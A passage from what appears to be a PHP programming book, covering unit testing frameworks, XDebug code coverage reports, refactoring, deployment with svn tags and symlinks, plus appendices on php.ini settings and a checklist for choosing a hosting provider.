lack of a formal method for the setup and teardown of test environments, and the
proliferation of files that occurs when we test classes with many methods.

Discussion
Additional reasons to choose a testing framework like SimpleTest or PHPUnit over
phpt include:

phpt lacks formal methods for assertions.
   Certainly, PHP’s own assert function offers the same functionality, but methods
   like assertTrue and assertContains have better names that indicate the type
   of assertion being made, and contain their own error handling functionality to
   ensure that the arguments provided conform to those expected.

phpt lacks formal methods for setting up and tearing down the test environment.
   While phpt offers mechanisms for setting up the request environment, they
   need to be performed in each test file; this deficiency also makes it difficult to
   share environments between tests.

phpt lacks mechanisms for sharing testing functionality between tests.
   In PHPUnit and SimpleTest, any method that doesn’t begin with the word test
   is just another method in the class, which means that you can create a more
   generalized method and call it from the individual test methods if several tests
   use similar testing strategies. The ability to easily share an environment without
             needing to load additional files or classes is especially useful, for obvious
             reasons.

      If SimpleTest and PHPUnit are so similar, how can you choose one over the other?
      The tool you use will depend on what you’ll be testing, and the test strategies you’ll
      use. Each testing framework has features that the other does not (although the feature
      sets are converging as the years progress). For example:

      ■ PHPUnit includes support for code coverage reports (using XDebug; this topic
        is covered later in “How can I determine what remains to be tested?”).

      ■ SimpleTest contains support for Mock Objects (PHPUnit 3 introduces this
        capability).

      ■ SimpleTest has web testing functionality (PHPUnit 3 introduces this capability
        through a third-party tool, Selenium RC).

      ■ SimpleTest has a very active user community.

      I use PHPUnit extensively, mainly because it suits the projects I contribute to and
      the coding standards that I follow, yet I’ve met many developers who swear by
      SimpleTest. Choose one testing framework and learn its ins and outs, then
      investigate the other to compare their strengths and weaknesses.

      Unit testing is a broad topic, and much of the information presented here is, by
      necessity, abbreviated. Choose a testing framework that suits your needs, and read
      up on the documentation for that framework as you start to write your tests. You
      may want to read up on unit testing in general as well.

      One subject that I haven’t covered here is the concept of Test Driven Development
      (TDD), or Test First Development. The basic tenet of TDD is to write unit tests first,
      then your code, and repeat the process until your project is complete. Many
      developers practice this strategy; it has many benefits, particularly when you refactor
      code or add features. For more information on TDD, see the Portland Pattern
      Repository wiki,16 and ExtremeProgramming.org.17




      16 http://c2.com/cgi/wiki?TestDrivenDevelopment
      17 http://www.extremeprogramming.org/rules/testfirst.html


How can I determine
what remains to be tested?
Regardless of whether you’re using Test Driven Development or writing your tests
after the fact, eventually you’ll need to know how much of your code has actually
been tested. Often, even though your tests are passing, substantial portions of your
code won’t have been exercised by your tests. How can you determine which code
has been exercised, and which has not?

Solution
PHPUnit 3 provides the ability to generate code coverage reports.18 This feature
requires XDebug to be installed on your machine. You can obtain XDebug via PEAR
or PECL, or download the extension yourself.19 In my experience, users of
*nix-based machines will need to compile the extension themselves. To do so, use the
following steps, substituting the appropriate paths, of course:20

 $ cd /path/to/xdebug/sources
 $ /path/to/phpize
 $ ./configure --with-php-config=/path/to/php-config
 $ make
 $ make install



Once XDebug is installed, you’ll need to enable the extension in your php.ini file.
Since this extension needs to interact with the Zend Engine, you must enable it as
a zend_extension:

 zend_extension = /full/path/to/xdebug.so 



The full path is required; without it, the PHP engine will not find the extension.




18 For documentation on PHPUnit’s code coverage report facilities, read the online documentation at
   http://www.phpunit.de/pocket_guide/3.0/en/code-coverage-analysis.html.
19 http://xdebug.org/
20 I originally covered this process in a blog entry entitled “Getting XDebug Working with PHPUnit For
   Code Coverage Reports,” at http://weierophinney.net/matthew/.

      You’ll also want to disable the extension by default (there’s no need to slow down
      your site unless you’re actually doing some profiling or checking code coverage).
      This can also be done in your php.ini:

       xdebug.default_enable = Off 



      While the code coverage reports run from the CLI, you may need to restart your web
      server after all the installation tasks and INI changes have been performed.

      Once XDebug is available, generating code coverage reports is as easy as throwing
      another switch to PHPUnit:

       $ phpunit --report /path/to/reports UnitTest



      The --report switch expects a directory argument. When it’s run in this fashion,
      PHPUnit generates code coverage reports after the tests are performed, and saves
      them as HTML files in the directory you specify. You can then browse these reports
      in a web browser. For example, Figure 13.3 shows the report I generated while
      developing the Zend_Controller class in the Zend Framework.




                Figure 13.3. Code coverage report generated with PHPUnit and XDebug


As the legend in Figure 13.3 shows, the report defines three thresholds of code
coverage:

■ 0–35%: low
■ 35–70%: medium
■ 70–100%: high

You can then drill down into individual files. A sample from
Zend_Controller_Action is shown in Figure 13.4.




      Figure 13.4. Code coverage analysis of Zend_Controller_Action showing a sampling of untested, dead, and tested code


      In a web browser, code coverage report output is color coded, with green marking
      code that has been executed, red marking code that was not executed, and orange
      marking “dead” code, or code that will never be executed (usually end braces).
      Comments, as well as function and class definitions, are never considered in code
      coverage.
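
      To make the three categories concrete, here is a rough sketch of how the raw data behind such a report can be collected and summarized. It uses Xdebug’s own coverage functions (xdebug_start_code_coverage, xdebug_get_code_coverage, and xdebug_stop_code_coverage); the summarizeCoverage helper is hypothetical, and this is not how PHPUnit itself is implemented. It assumes Xdebug is loaded; on Xdebug 3 it also assumes xdebug.mode includes coverage.

```php
<?php
/**
 * Summarize the per-line data Xdebug reports for a single file.
 * Status values: 1 = executed, -1 = not executed, -2 = dead code.
 * summarizeCoverage() is a hypothetical helper, not part of Xdebug or PHPUnit.
 */
function summarizeCoverage(array $lines)
{
    $summary = array('executed' => 0, 'untested' => 0, 'dead' => 0);
    foreach ($lines as $status) {
        if ($status > 0) {
            $summary['executed']++;
        } elseif ($status === -1) {
            $summary['untested']++;
        } elseif ($status === -2) {
            $summary['dead']++;
        }
    }

    // Dead code can never run, so it is left out of the percentage.
    $executable = $summary['executed'] + $summary['untested'];
    $summary['percent'] = $executable > 0
        ? round(100 * $summary['executed'] / $executable, 1)
        : 0.0;

    return $summary;
}

// Only attempt collection when Xdebug is actually loaded.
if (function_exists('xdebug_start_code_coverage')) {
    xdebug_start_code_coverage(XDEBUG_CC_UNUSED | XDEBUG_CC_DEAD_CODE);
    strtoupper('the code under test would run here');
    $data = xdebug_get_code_coverage();
    xdebug_stop_code_coverage();

    foreach ((array) $data as $file => $lines) {
        $s = summarizeCoverage($lines);
        printf("%s: %.1f%% of executable lines run\n", $file, $s['percent']);
    }
}
```

      Leaving dead code out of the percentage is a design choice made for this sketch; a closing brace that can never be reached says nothing about how well the code is tested.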

      By generating these reports frequently, you can quickly determine which files need
      more coverage, and which code needs testing.


               Don’t Hold Out for 100%!
             Genuine 100% code coverage is impossible to achieve in most cases, even when
             the report shows that it has been achieved. Code is often written to account
             for many different situations, and a test that covers just one of them is
             enough to mark that code as exercised, yet there’s no way to test all cases.
             The general rule of thumb holds that test coverage of 85% or greater is
             excellent.



I’ve reviewed some of my old code, and it’s
horrible. How can I make it better?
Of course, you’re one of those good developers who maintain their code rigorously,
or, at the very least, you occasionally go back and review code you wrote six months
or a year ago, right? And, as you learn new techniques or new approaches to
problems, the code you wrote before suddenly looks like a mess of tangled, overcooked
spaghetti.

Solution
The solution to the old-code nightmare is summed up in a single word: refactoring.
Quite simply, refactoring is the act of revising a program to make it more readable,
or to give it a better structure, while preserving the program’s functionality.

If your code has been unit tested previously, you have a great foundation for
undertaking such a task. Create a new branch in your revision control system and start
hacking away at your code. Run the existing tests regularly as you work to ensure
that nothing breaks. Based on your changes, you may need to add new unit tests.
Be wary of altering the existing unit tests, however: they describe the behavior
that other code already relies on, so changing them may lead to incompatibilities.

If the code in question has not been tested previously, you have a bit more work to
do. Your first step should be to write unit tests for the existing code. This approach
will effectively produce a contract for the new code, which must pass these tests.
Additionally, in writing the tests, you’ll likely identify which areas of the code are
most brittle and need to be rewritten, and uncover some bugs. Once your tests are
finished, start the process of rewriting, running your test suite often.
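
As a small illustration of tests acting as a contract, consider the sketch below. Both functions and their names (legacySlug and refactoredSlug) are hypothetical examples of my own; the point is only that the same table of expected results is checked against the old code first, and then against the rewrite.

```php
<?php
// Hypothetical legacy function: it works, but it is hard to read.
function legacySlug($title)
{
    $allowed = 'abcdefghijklmnopqrstuvwxyz0123456789';
    $title = strtolower($title);
    $out = '';
    for ($i = 0; $i < strlen($title); $i++) {
        if (strpos($allowed, $title[$i]) !== false) {
            $out .= $title[$i];
        } elseif (substr($out, -1) != '-') {
            $out .= '-';
        }
    }
    return trim($out, '-');
}

// Refactored version: same behavior, clearer structure.
function refactoredSlug($title)
{
    return trim(preg_replace('/[^a-z0-9]+/', '-', strtolower($title)), '-');
}

// The "contract": inputs paired with the output the legacy code produces today.
$cases = array(
    'Hello, World!'   => 'hello-world',
    '  PHP 5 & PDO  ' => 'php-5-pdo',
    'already-a-slug'  => 'already-a-slug',
    ''                => '',
);

foreach ($cases as $input => $expected) {
    $ok = legacySlug($input) === $expected
        && refactoredSlug($input) === $expected;
    echo ($ok ? 'PASS' : 'FAIL'), ': "', $input, "\"\n";
}
```

In a real project the table of cases would live in a SimpleTest or PHPUnit test case rather than a loop, but the workflow is the same: pin down current behavior, then rewrite.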


      Discussion
      Refactoring is a complex topic, and the solution presented here is the briefest of
      summaries. If you’d like to dig into a thorough discussion of the subject, I recommend
      a classic reference: Martin Fowler’s Refactoring.21


      How can I deploy code safely?
      As PHP developers, we don’t release code in the typical development model: code,
      build, package, release. More often than not, we find ourselves making tweaks on
      live systems, or deploying code directly onto a live web site.

      Problems arise in these situations, as we introduce the possibility of site breakage.
      How many times has a fix or a new feature broken your web site? How many times
      have you needed to roll back to the previous version of a project, but had no clean
      way to do so?

      With any luck, you’re already on the way to solving many of these problems by
      following the examples shown previously in this chapter:

      ■	 Use revision control software.
      ■	 Maintain separate development and production branches of your site in your
         versioning system.
      ■	 Tag your production branch prior to release.
      ■	 Write and run unit tests for your code.
      ■	 Make sure as much of your code as possible is being exercised by your unit tests.


      Solutions
      With those tools already in place, you have only a little way to go to reach the calm
      waters of safe code deployment.

      Using Tags and Symlinks
      First, set up a staging or quality-assurance server that can run off a checked-out
      copy of your production branch. This server can be a separate virtual host on the
      same machine as your production server (though that’s not recommended), or on a
      separate server entirely, preferably behind a firewall (you guessed it: this approach
      is recommended).

      21 Martin Fowler, Refactoring (Reading, MA: Addison-Wesley Professional, 1999).

Once you’ve merged your changes from the development branch or trunk into your
production branch, test the site. Use unit tests as well as testing visually, using a
browser—looking at your project can often reveal issues that your tests simply
cannot find.

Once you’re confident that the site works to your satisfaction—or even better, to
your boss’s or client’s satisfaction—tag the production branch. I usually name my
tags with a combination of the date and a summary of the changes being introduced,
something like this:

 $ svn copy https://example.com/svn/project/branch/production \
     https://example.com/svn/project/tag/2007-01-01-NewYearAnnc \
     -m 'New Year announcements'



Create an export of the tag on your production server:

 $ svn export \
     https://example.com/svn/project/tag/2007-01-01-NewYearAnnc \
     /path/to/web/2007-01-01-NewYearAnnc


Then, when you’re ready to launch the changes, use a symlink. A symlink, or
symbolic link, is a special directory entry in Unix-based operating systems: rather
than being a file or directory itself, it is a reference to another directory entry.
In this example, we’ll assume that /path/to/web/production is where your site is
installed. This will be a symlink. When it comes time to launch, make a note of the
location to which the symlink points, then execute the following commands:

 $ rm /path/to/web/production 

 $ ln -s /path/to/web/2007-01-01-NewYearAnnc /path/to/web/production 



If you need to roll back to the previous version, simply point the symlink to the
previous install directory.
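
If you’d rather script the switch, the sketch below shows one possible approach in PHP. It is an illustration under assumptions, not a drop-in deployment tool: the switchRelease function and the 2006-12-01-Holiday directory are hypothetical, the code assumes a Unix-like system, and it runs in a scratch directory rather than a real web root. Instead of removing the old link first, it creates the new link under a temporary name and renames it over the live one, which avoids the brief gap in which the production path doesn’t exist.

```php
<?php
/**
 * Point $link at $releaseDir and return the previous target (or null).
 * switchRelease() is a hypothetical helper; paths are supplied by the caller.
 */
function switchRelease($releaseDir, $link)
{
    clearstatcache();
    $previous = is_link($link) ? readlink($link) : null;

    // Build the new symlink under a temporary name first...
    $tmp = $link . '.tmp-' . getmypid();
    if (!symlink($releaseDir, $tmp)) {
        throw new RuntimeException("Could not create symlink $tmp");
    }

    // ...then rename it over the live one in a single step.
    if (!rename($tmp, $link)) {
        unlink($tmp);
        throw new RuntimeException("Could not replace $link");
    }

    return $previous;
}

// Demonstration in a scratch directory rather than a real web root.
$base = sys_get_temp_dir() . '/deploy-demo-' . getmypid();
mkdir($base . '/2006-12-01-Holiday', 0777, true);
mkdir($base . '/2007-01-01-NewYearAnnc', 0777, true);
$link = $base . '/production';

switchRelease($base . '/2006-12-01-Holiday', $link);
$previous = switchRelease($base . '/2007-01-01-NewYearAnnc', $link);
echo 'Live: ', readlink($link), "\n";

// Roll back by pointing the link at the release it replaced.
switchRelease($previous, $link);
echo 'Rolled back to: ', readlink($link), "\n";
```

Returning the previous target from the function takes care of the “make a note of the location” step, so a rollback is just a second call.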

      Using a Build System
      Additional tasks will, more than likely, need to be undertaken during deployment.
      Often, user-generated content is not kept in the repository, so it will need to be
      transferred into the new installation directory prior to launch. If database changes
      have been made between versions, they will also need to be applied, or a separate
      database will need to be used, and content synchronized between production and
      the staging install. If many additional tasks such as these are required when you
      deploy a new version of your web site, you may need to investigate using a build
      system that can take care of this sort of thing for you. Examples include:

      GNU Make (http://www.gnu.org/software/make/)
        The venerable GNU Make can be used for much more than C code, and has been
        used in many projects successfully for performing site installation and upgrade
        tasks.

      Phing (http://phing.info/trac/)
         Phing (PHing Is Not GNU make) is based on Apache Ant, a Java build system.
         With Phing, you use XML build files to create your build targets and tasks.

      Take great care to determine all the tasks that you need to perform in order to
      successfully launch your site, and complete test runs on your development box regularly.
      The more numerous and complicated the tasks, the more likely you are to introduce
      errors. Adhere to the KISS principle (Keep It Simple, Stupid) as much as possible,
      and your project deployment will be more successful.

      Discussion
      If you have a team of programmers, make sure that the deployment process is so
      easy that any single member of your team could deploy the project on his or her
      own box with a minimum of effort.

      The symlink method may seem overly simplistic, but, as I think I’ve mentioned,
      the simpler you can keep the deployment process, the greater the likelihood that
      it’ll be a success. Ultimately, the success of any deployment will depend upon the
      overall development process, from planning, to coding, to final release—and
      everything in between. If you’re coding for extensibility, writing and running your
      unit tests, documenting your code, and making efficient and effective use of your
revision control software, simple, reliable processes may be all you need when it
comes to final deployment.


Summary
Best practices encompass a wide variety of topics, any one of which could be covered
in a chapter of its own—or even a book. Many of the concerns we covered in this
chapter may seem unimportant at first, especially if you’re the sole maintainer of
your project, or work in a small group of like-minded developers. However, the first
time you need to work on a public project, or with another team of developers—or,
worse, delete your project tree or introduce an error into your project—the value of
these practices will become readily apparent.

Revision control will quickly become your friend, particularly when you want to
keep your production code stable while continuing development on your project,
be it to add new features or fix bugs. When you need to develop a feature that touches
many areas of code, being able to branch to keep your changes isolated from the
main development trunk becomes an invaluable advantage.

Adopting a coding standard will save you many headaches as you have others review
your code, and you review the code of others. If you all write in the same style, the
code will be easier to read and decipher. Additionally, using sane file and class
naming conventions will make it easier to find code for later revisions, and prevent
the issues associated with naming collisions.

Code documentation is often overlooked. Tools like phpDocumentor make the
documentation of your code, while you write it, much easier. Run phpDocumentor
on your code base once, having written a few code blocks, and you’ll see how quickly
you can generate API documentation merely by adding a few comments to your
code.

I could have devoted an entire book to the subject of unit testing. I’d even go so far
as to say that unit testing is arguably the single best practice from this chapter that
you should learn and incorporate into your daily routine. Testing your code will
help you better define your interfaces, isolate them from each other, and develop
more stable, reliable code. Write tests, and, more importantly, run them often. Run
code coverage reports periodically to ensure that you exercise as much of your code
as possible.

      Finally, an often-overlooked aspect of PHP development is the actual deployment
      process: the gritty details of pushing your code to the production server, and
      ensuring that you can roll back if it fails. Tools like GNU Make and Phing can help
      automate these tasks; however, don’t underestimate the simplicity of a good
      repository strategy and symlinks. Often the simplest solution is best!

      I’ve only scratched the surface with the practices outlined in this chapter. Incorporate
      what you can into your daily habits, but also examine your processes constantly
      and ask yourself how you can perform tasks better. Refactoring your processes will
      ultimately be the most useful tool in your toolbox.
Appendix A: PHP Configuration

This quick reference to PHP configuration covers the most important general settings
you need to be aware of, either when running applications in a live environment,
or because they impact upon security or the way you write code.


Configuration Mechanisms
The primary mechanism for configuring PHP is the php.ini file. As the master file,
it provides you with control over all configuration settings. PHP’s manual contains
a guide to configuring PHP,1 and documents all the available configuration options,
and where they can be set.2 Note that some configuration options can only be set
in the php.ini file, while others can be set in other locations as discussed later in
this section.

Entries in the php.ini file generally take the following format:

    setting=value



Be sure to read the comments provided in the file before making changes, though.
The comments describe a few tricks, such as include_path using a colon (:) as a
separator on Unix and a semicolon (;) on Windows, that you’ll want to be aware
of.
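
When you set the include path from code rather than from php.ini, you can avoid hard-coding either separator. Here’s a minimal sketch using PHP’s built-in PATH_SEPARATOR constant together with get_include_path and set_include_path; the directory shown is purely illustrative and is an assumption of mine.

```php
<?php
// Illustrative library directory; substitute your own.
$extra = '/home/username/pear';

// PATH_SEPARATOR is ":" on Unix and ";" on Windows.
$paths = explode(PATH_SEPARATOR, get_include_path());

// Append the directory only if it is not already on the path.
if (!in_array($extra, $paths)) {
    $paths[] = $extra;
    set_include_path(implode(PATH_SEPARATOR, $paths));
}

echo get_include_path(), "\n";
```

Because the existing path is kept and extended, the current directory (.) stays on the include path if it was there to begin with.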

Most web hosts won’t allow you access to your php.ini file unless you have root
access to the system, which is typically not the case if you’re using a cheap, shared
hosting service. The alternative is to use .htaccess files to configure PHP (assuming
the web server is Apache).

An .htaccess file is a plain text file that you place in a public web directory, and use
to control the way Apache behaves when it comes to serving pages from that
directory; for instance, you might identify in the .htaccess file the pages to which
you’ll allow public access. Note that the effect of an .htaccess file is recursive: it
applies to subdirectories as well.



1 http://www.php.net/manual/en/configuration.php
2 http://www.php.net/manual/en/ini.php

      In order for you to configure PHP with .htaccess files, your hosting provider must
      have applied the Apache setting AllowOverride Options or AllowOverride All
      to your web directory in Apache’s main httpd.conf configuration file. If that has
      been done, you can use two Apache directives to modify PHP’s configuration:

      php_flag
          used for settings that have Boolean values (that is, on/off or 1/0), such as
          register_globals

      php_value
          used to specify a string value for settings, such as the include_path setting

      Here’s an example of an .htaccess file:

       # Switch off register globals
       php_flag register_globals off

       # Set the include path
       php_value include_path ".:/home/username/pear"



      The final mechanism that controls PHP’s configuration is a group of functions:
      ini_set and ini_alter let you modify configuration settings, ini_get allows you
      to check configuration settings, and ini_restore resets a setting to the value
      defined by php.ini and any .htaccess files. Here’s an example in which using
      ini_set allows us to avoid having to define our host, user name, and password
      when connecting to MySQL:

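       // Set connection defaults so mysql_connect() can be called without arguments.
       // Note: this relies on the legacy mysql extension, which was removed in PHP 7.
       ini_set('mysql.default_host', 'localhost');
       ini_set('mysql.default_user', 'harryf');
       ini_set('mysql.default_password', 'secret');

       if (!mysql_connect())
       {
         echo mysql_error();
       }
       else
       {
         echo 'Success';
       }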

Be aware that for some settings, such as error_reporting, PHP provides alternative
functions that perform effectively the same job as ini_set. You can use whichever
approach you prefer.
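
The short script below sketches how these functions fit together. The choice of the precision setting is mine, picked only because it is harmless to change at runtime; everything else uses standard PHP functions.

```php
<?php
// Remember the configured value so we can compare after restoring.
$original = ini_get('precision');

// ini_set() changes the setting for the rest of this script only.
ini_set('precision', '10');
echo 'During: ', ini_get('precision'), "\n";

// ini_restore() returns the setting to its configured value.
ini_restore('precision');
echo 'After: ', ini_get('precision'), "\n";

// error_reporting() is the dedicated alternative to
// ini_set('error_reporting', ...).
error_reporting(E_ALL);
echo 'error_reporting: ', ini_get('error_reporting'), "\n";
```

Changes made this way last only for the duration of the request, which makes them a reasonable fit for per-script tweaks but not for site-wide policy.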

Note that certain settings, such as register_globals, can only be usefully modified
by php.ini or .htaccess, because such settings influence PHP’s behavior before it begins
to execute your scripts.

Furthermore, some configuration settings can be changed only in php.ini:
extension_dir, for instance, which tells PHP the directory in which PHP extensions can
be found. For a complete reference on controlling settings, refer to The PHP Manual.3


Key Security and Portability Settings
Table A.1 shows the most important PHP settings that relate to the security and
portability of your PHP scripts.


Includes and Execution Settings
Table A.2 shows the most important PHP settings that relate to includes, and how
well your PHP scripts run.




3 http://www.php.net/ini_set

      Table A.1. Key Security and Portability Settings

       register_globals (default: off)
          This setting automatically creates global variables from incoming HTTP request
          variables, such as GET and POST. For security and portability reasons, it’s
          strongly recommended that you switch off this setting. See the section called
          “Turning register_globals Off” in Chapter 1 or
          http://www.php.net/register_globals/ for more details.

       magic_quotes_gpc (default: off)
          This setting automatically escapes quotes in incoming HTTP request variables
          with a backslash, helping to prevent SQL injection attacks. If you know what
          you’re doing, it’s usually better to switch off this functionality and handle
          the escaping yourself when inserting data into a database, given the problems
          this feature can cause with forms, and the performance overhead it introduces.
          See the section called “Checking for Magic Quotes” in Chapter 1 for
          information on making your scripts compatible with this feature.

       call_time_pass_reference (default: off)
          This setting allows you to use variable references (e.g.
          htmlentities(&$string)) at call time. To keep code clean and understandable,
          and to ensure its portability, keep this functionality switched off.

       short_open_tag (default: on)
          This setting allows you to start a block of PHP code with just <? instead of
          the longer <?php. It also lets you write out PHP expressions with <?=, which
          is identical to <?php echo. While convenient, these shortcuts are not XML
          compliant, and can cause the PHP processor to become confused when it
          encounters XML processing instructions such as <?xml version="1.0"?>. Many
          people have short_open_tag switched off, so, for maximum portability, avoid
          the shortcuts and switch off this feature during development.

       asp_tags (default: off)
          A setting that allows ASP-style tags (<% … %>) to be used as an alternative to
          the PHP open and close tags (<?php … ?>). Few people use this feature, so, for
          maximum portability, it’s best to avoid these tags, and switch off this
          feature during development.

       error_reporting (default: E_ALL & ~E_NOTICE)
          When developing, and for maximum portability, it’s best to set this option to
          E_ALL (or E_ALL | E_STRICT in PHP 5, where E_STRICT is not part of E_ALL before
          version 5.4), so that PHP will inform you of situations where, for example, a
          $_GET variable your code relies upon has not been initialized. This forces you
          to write code that’s more secure and contains fewer logic errors, in order to
          avoid warnings. This also ensures that your code will run neatly on other
          servers configured this way.

       display_errors (default: on)
          This setting determines whether or not PHP sends error messages to the
          browser. When you’re running your application in a live environment, it’s
          generally better to switch off this option, and instead to use PHP’s logging
          mechanism to capture errors to a file, for example.

       open_basedir (default: not set)
          This setting allows you to restrict all PHP file operations to a given
          directory and its subdirectories. This can be a good idea if, for example, you
          want to prevent a script that’s used to display the contents of files from
          being used to access sensitive files elsewhere on your server.

       allow_url_fopen (default: on)
          This setting allows you to specify remote file locations for use with
          functions like fopen (e.g. fopen('http://www.sitepoint.com/','r');). It’s a
          handy tool but is also potentially a security risk for a badly written script.
          Switch it off if you know you don’t need it.

      Table A.2. Includes and Execution Settings

                Setting          Default                            Notes

      include_path               '.'       This setting allows you to specify the relative and
                                           absolute paths that PHP should search when you use
                                           one of the include-related commands. Make sure you
                                           specify at least the current directory (.), or most
                                           third-party scripts will fail to work. On Unix systems,
                                           the list of directories is separated by colons (:), while
                                           on Windows the separator is a semicolon (;). To make
                                           your life easier, the constant PATH_SEPARATOR is
                                           set to the correct list separator for the operating
                                           system, making it easier to produce
                                           cross-platform-compatible code.

      auto_prepend_file          not set   PHP will execute the file(s) specified in this setting
                                           before executing any requested script. This setting is
                                           useful for performing site-wide operations such as
                                           security, logging, defining error handlers, stripping
                                           backslashes added by the magic quotes feature, and so
                                           on. It’s also useful for applications that you’re sure you
                                           will only use yourself, but is unsuitable for use in code
                                           you intend to distribute, as those who are unable to
                                           modify php.ini settings with .htaccess files will
                                           be unable to use such code. The list separator is the
                                           same as that used for the include_path setting.

      auto_append_file           not set   The twin of auto_prepend_file, this setting names the
                                           file(s) that PHP executes after a requested script
                                           has run.

      max_execution_time         30        This setting specifies the maximum execution time (in
                                           seconds) for which a PHP script run via a web server
                                           may be allowed to execute. Generally, it’s best to leave
                                           this as the default setting and use the
                                           set_time_limit function to extend the limit on
                                           a per-script basis. A value of 0 for either setting
                                           removes limitations on script execution time.
memory_limit      8M        This setting determines the amount of memory PHP
                            has available to it at runtime. Usually, the default is
                            fine, but when you’re handling very large XML
                            documents, for example, or dealing with images, you
                            might need to increase it. The bigger this value, the
                            more memory a script is allowed to use, and the less
                            memory will be available for other applications running
                            on your server.

post_max_size     8M        This setting reflects the maximum amount of data that
                            PHP will accept via an HTTP POST (e.g. a form that
                            uploads an image). You might need to increase this
                            value if you have an application that will allow users
                            to upload bigger files.
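
The include_path note in Table A.2 can be sketched as follows. This is a minimal example, assuming a hypothetical lib directory beside the script; PATH_SEPARATOR holds the list separator (a colon or a semicolon), while DIRECTORY_SEPARATOR holds the slash used inside a single path.

```php
<?php
// Hypothetical directory holding shared library code (an assumption for this sketch).
$libDir = __DIR__ . DIRECTORY_SEPARATOR . 'lib';

// Build the list with PATH_SEPARATOR (":" on Unix, ";" on Windows),
// keeping the current directory (.) first so third-party scripts still work.
$newPath = implode(PATH_SEPARATOR, array('.', $libDir, get_include_path()));
set_include_path($newPath);
```

Setting the path at runtime like this avoids depending on php.ini access, which not every host provides.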


      Error-related Settings

      Table A.3 shows the most important PHP settings that relate to the way PHP handles
      errors. Note that display_errors and error_reporting are not included here, as
      they were described in Table A.1.

      Table A.3. Error-related Settings

                 Setting            Default                                Notes

       log_errors                   off       This setting, in conjunction with error_log (below),
                                              allows you to log errors to a text file. It’s useful for a
                                              live site where you’ve switched off the display of errors
                                              to visitors.

       error_log                    not set   This setting allows you to specify the name of a file to
                                              which errors are logged when log_errors is
                                              switched on.

       ignore_repeated_errors       off       Using this setting, if the same error occurs multiple
                                              times from the same line of a given PHP script, the
                                              error will only be reported once per script execution.
                                              This setting helps prevent the massive log files that can
                                              result from errors that occur in loops and are logged
                                              to a text file.

       ignore_repeated_source       off       This setting is similar to
                                              ignore_repeated_errors, but, in this case, it
                                              also suppresses repeated errors that come from
                                              different files or lines of a PHP script.

       report_memleaks              on        Make sure this setting is switched on, especially if
                                              you’re using experimental versions or nonstable releases
                                              of PHP. Otherwise, you might end up crashing your
                                              server once leaked memory has eaten up all the
                                              available space. error_reporting must be set to
                                              report warnings for this setting to apply.


Miscellaneous Settings

Table A.4 shows additional important settings that you should be aware of in your
PHP configuration.

Table A.4. Miscellaneous Settings

           Setting            Default                            Notes

 session.save_path            /tmp      If you’re storing sessions in files on a Windows-based
                                        system, you’ll need to modify this setting to an available
                                        directory to which PHP can write session files.

 session.use_cookies          1         This setting uses cookies to store the session ID on the
                                        client, rather than placing the session ID in the URL
                                        (which can present a risk to security).

 extension_dir                './'      This setting specifies the path under which compiled
                                        PHP extensions can be found. On Windows-based
                                        systems, it might be something like this: extension_dir
                                        = C:\php\extensions

 extension                              On Windows-based systems only, this setting is used
                                        to identify all the extensions that should be loaded.
                                        The extensions specified should reside in the
                                        extension_dir path (above), for example, extension =
                                        php_xslt.dll.
Appendix B: Hosting Provider Checklist

PHP, and, more generally, the LAMP combination of Linux, Apache, MySQL, and
PHP/Perl/Python, are widely available via literally thousands of web hosts at very
affordable prices. You can easily access quality web hosting that will suit 90% of
your needs quite inexpensively. That said, all PHP installations are not created
equal—their capabilities depend largely on the configuration settings defined in
php.ini, as well as the extensions the host has installed for you. A number of general
issues relating to the amount of control you’re given over your own environment
also deserve consideration if you’re to avoid trouble later on.

This appendix summarizes the key issues you should investigate before paying for
a hosting service. Contact potential providers and ask them to respond to each of
these points. Follow up by asking for the opinions of other people who’ve used the
service in question—there are many online forums where you’ll find people who
are able to offer advice. Be aware, though, that the ratio of “knowledgeable” to
“ignorant” people is stacked highly in favor of ignorance; familiarize yourself with
technical details so that you’re able to verify that the answers you’re given are well
informed.

Some of the points I’ve included here may seem a little extreme, but once you’ve
been around the block a few times, you’ll probably want to get value for your money,
rather than spending your Saturday mornings fixing the problems your host made
for you on Friday night.


General Issues
Consider these issues whichever host you’re looking at—they’re the key markers of
a decent service.

Does the host support Linux and Apache?
From the point of view of performance and reliability, the Linux–Apache setup is
the best combination. Ask for details of the Linux distribution. Although Red Hat
and its derivatives (such as CentOS and Fedora) are popular, you might find hosts
using Debian or Ubuntu—or, better yet, Rock Linux—know more about what they’re
doing.

      Avoid any host that uses Apache 2.x with a threaded multiprocessing module
      (MPM), as there are still many third-party libraries that aren’t thread safe. Stick with
      a host that offers Apache 2.x with the prefork MPM, or Apache 1.3.x.

      Does the host provide you with SSH access to the
      server?
      SSH gives you a secure connection to the server, through which you can perform
      tasks from the Linux command line, or transfer files with SCP (Secure Copy Protocol)
      or SFTP (SSH File Transfer Protocol). Avoid any host that allows you to use telnet,
      as this is a fundamentally insecure way to connect to a server over the Internet. For
      Windows users, Putty1 makes an excellent SSH client and command line tool, while
      WinSCP2 provides a secure file transfer mechanism using an SSH connection.

      Alternatively, make sure you can upload files using FTPS (FTP over SSL). Don’t
      transfer files with FTP—it’s as insecure as telnet.

      Is the host a reseller, or does it maintain servers
      itself?
      Resellers can provide significant value if you need help at a basic technical level
      (if, for example, you’re a beginner), but they generally have the same level of control
      over the server as you do. Going “straight to the source” means you won’t have to
      deal with delays when there are system problems, as you’ll likely be dealing directly
      with those who maintain the server. The downside is that they tend to be less
      newbie tolerant, so you might get answers—but not ones you can understand!

      To what degree does the host “overload” the server?
      Many web hosting companies create far more accounts on a server than the maximum
      for which the system is specified. To gauge the degree of server overload, the best
      metric is obtained using the uptime command (if you have access to use it); this
      will tell you the server load averages over one, five, and 15 minutes. Ideally, the
      server should never have load averages above one. Obviously, the issue isn’t really
      as simple as this, but once you see your server hit averages in excess of five, you’ll
      begin to experience significant delays in your PHP-based applications.
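
If the host allows PHP but not shell access, the same figures that uptime reports can be read from PHP. The following is a rough sketch: sys_getloadavg is a standard PHP function (unavailable on Windows), while describe_load, its labels, and its use of the thresholds of one and five mentioned above are assumptions made for illustration.

```php
<?php
// Classify a set of load averages using the rough thresholds from the text:
// at or below 1 is ideal, above 5 means noticeable delays.
// The function name and labels are hypothetical.
function describe_load(array $load)
{
    $worst = max($load);
    if ($worst <= 1.0) {
        return 'ideal';
    }
    if ($worst > 5.0) {
        return 'overloaded';
    }
    return 'busy';
}

// sys_getloadavg() returns the 1, 5, and 15 minute load averages.
if (function_exists('sys_getloadavg')) {
    $load = sys_getloadavg();
    if ($load !== false) {
        echo describe_load($load), "\n";
    }
}
```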

      1 http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
      2 http://winscp.net/eng/


What’s the hosting provider’s policy on running scripts
